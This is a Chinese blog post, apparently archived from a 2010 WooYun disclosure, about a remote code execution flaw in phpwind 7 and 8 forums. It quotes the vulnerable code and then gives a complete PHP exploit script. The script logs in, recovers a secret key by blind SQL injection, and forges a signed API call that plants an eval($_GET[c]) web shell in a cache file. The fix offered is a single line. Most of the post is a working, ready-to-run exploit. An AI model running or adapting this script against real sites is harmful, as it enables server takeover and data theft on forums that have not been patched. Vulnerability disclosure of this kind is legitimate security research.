\xeb\xfe's Blog.

phpwind远程代码执行漏洞-2010.09

wooyun-1000php
2017/12/08

简要描述

phpwind较高版本论坛中存在一个严重的漏洞,成功利用该漏洞可以远程执行任意php代码,影响phpwind 7和phpwind 8

详细说明

漏洞代码(pw_ajax.php)

1
2
3
4
5
6
7
8
9
10
11
12
13
} elseif ($action == 'pcdelimg') {
	InitGP(array('fieldname','pctype'));
	InitGP(array('tid','id'),2);
	if (!$tid || !$id || !$fieldname || !$pctype) {
			echo 'fail';
	}
	$id = (int)$id;
	if ($pctype == 'topic') {
		$tablename = GetTopcitable($id);
	} elseif ($pctype == 'postcate') {
		$tablename = GetPcatetable($id);
	}
	$path = $db->get_value("SELECT $fieldname FROM $tablename WHERE tid=". pwEscape($tid));

$id进行了整数化,但是$fieldname未经任何有效的过滤(全局的一些其他的比较搞笑看起来不错的过滤对这里不起任何安全上的意义,只是对漏洞利用带来了一些难度),利用该注射可以获取任何数据库里的数据。

另外class_other.php中存在一个任意命令执行的漏洞

1
2
3
4
5
6
7
8
9
10
11
function threadscateGory($classdb) {//生成帖子交换分类
        $classcache = "<?php\r\n\$info_class=array(\r\n";
        foreach ($classdb as $key => $class) {
            !$class['ifshow'] && $class['ifshow'] = '0';
            $flag && $info_class[$class['cid']]['ifshow'] && $class['ifshow'] = '1';
            $class['name'] = str_replace(array('"',"'"),array("&quot;","&#39;"),$class['name']);
            $classcache .= "'$class[cid]'=>".pw_var_export($class).",\r\n\r\n";
        }
        $classcache .= ");\r\n?>";
        writeover(D_P."data/bbscache/info_class.php",$classcache);
    }

$class[cid]未经过滤,我们可以往里面直接 写精心构造的shellcode,进入此逻辑需要一些较为关键的key,借助上面的注射漏洞即可获得该key,满足全部条件之后就会生成一个info_class.php

漏洞证明(POC)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
<?php
echo " 
Info: Poc for Phpwind远程命令执行
Test: exploit.php user password http://**.**.**.**/phpwind/
";
if($argc<3){
	echo "\r\n参数缺少\r\n";
	die();
}
$user=$argv[1];
$pass=$argv[2];
$pwurl=$argv[3];
$myheader=array(
		'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language: zh-cn,zh;q=0.5',
		'Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7',
		'Content-Type: application/x-www-form-urlencoded; charset=UTF-8',
		'Referer: http://**.**.**.**/',
        'Connection: Keep-Alive', 
        'Cache-Control: no-cache',
		'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2)'
    );
$cookie="";
$str=curlsend("$pwurl/login.php?","POST",0,$myheader,"forward=&jumpurl=http%3A%2F%2F**.**.**.**%2FPHPWind/upload%2F&step=2&lgt=0&pwuser=$user&pwpwd=$pass&hideid=0&cktime=31536000&submit=%B5%C7%C2%BC",1);
preg_match_all("/Set-Cookie:([^;]+)/is",$str,$array);
for($i=0;$i<count($array[1]);$i++){
	$cookie=$cookie.";".$array[1][$i];
}
//echo $cookie;
$test = curlsend('$pwurl/pw_ajax.php',"POST",0,$myheader,'',1);
if(strpos($test,'<ajax>')) {
	die('用户密码或者其他参数错误');
}
$shellcode="action=pcdelimg&fieldname=db_value%20from%20pw_config%20where%20db_name%20like%200x64625f736974656f776e65726964%20and%20db_value%20like%200x{offset}25%20union%20select%200x612e2e;%23";
$hash="0123456789abcdef";
$craked="";
for($i=0;$i<32;$i++){
	for($n=0;$n<16;$n++){
		$tmp=str_replace("{offset}",bin2hex($craked.$hash[$n]),$shellcode);
		$tmp=curlsend("$pwurl/pw_ajax.php","POST",0,$myheader,$tmp,0);
		if(strpos($tmp,"pw_config")){
			echo "CrackEd Offset ".($i+1)." :".$hash[$n]."\r\n";
			$craked=$craked.$hash[$n];
			break;
		}
	}
}
echo "Craked Magicdata :".$craked."\r\n";
echo "Get shell :";
//another 0day
$arg='';
$hack = array();
$hack['mode'] = 'Other';
$hack['method'] = 'threadscateGory';
$hack['params'] = 'a:1:{s:3:"cid";a:1:{s:3:"cid";a:1:{s:3:"cid";s:21:"\'.eval($_GET[c]).\'abc";}}}';
$hack['type'] = 'app';
$hack = strips($hack);
ksort($hack);
reset($hack);
foreach ($hack as $key => $value) {
	if ($value && $key != 'sig') {
		$arg .= "$key=$value&";
	}
}
$arg.='sig='.md5($arg.$craked);
echo file_get_contents("$pwurl/pw_api.php?".$arg);
echo "OK\r\n";
$str=file_get_contents("$pwurl/data/bbscache/info_class.php?c=echo%20Just_wooyun;");
if(strpos($str,'wooyun')){
	echo "Got shell :"."$pwurl/data/bbscache/info_class.php?c=phpinfo();";
	echo "\r\nOver!";
}

function strips($param) {
	if (is_array($param)) {
		foreach ($param as $key => $value) {
			$param[$key] = strips($value);
		}
	} else {
		$param = stripslashes($param);
	}
	return $param;
}

function curlsend($url,$method=false,$ssl=0,$myheader,$data='',$header=0){
global $cookie;
$ch = curl_init();
$timeout = 0; // set to zero for no timeout
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_POST, $method);
curl_setopt($ch,CURLOPT_HTTPHEADER,$myheader);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
if($data){
curl_setopt ($ch, CURLOPT_POSTFIELDS,$data);
}
curl_setopt ($ch, CURLOPT_HEADER, $header);
if($ssl){
	curl_setopt($ch,  CURLOPT_SSL_VERIFYPEER,  FALSE);
}
$handles = curl_exec($ch);
curl_close($ch);
//echo $handles;
return $handles;
}

POC代码原理分析

首先通过curl结合上述SQL注入漏洞得到用户user和密码password以及爆破出一些重要的key,然后开始构造shellcode往文件中写入GET一句话(eval($_GET[c])),c为传入的参数,通过传入echo字符串(echo Just_wooyun),然后判断页面中是否存在wooyun这个字符串来判断一句话是否写入成功,如果已经写入成功,直接把c=phpinfo();拼接在链接后面,打印出来

POC执行成功截图


修复方案

对用户输入的数据深入过滤

原文链接:phpwind远程代码执行漏洞-2010.09

CATALOG
  1. 1. 简要描述
  2. 2. 详细说明
  3. 3. 漏洞证明(POC)
  4. 4. POC代码原理分析
  5. 5. POC执行成功截图
  6. 6. 修复方案
archive tags
目前才写: 23 篇博文,好好努力吧,骚年。
2017
漏洞评估 小试牛刀 web渗透-文件上传 wooyun-1000php 脑图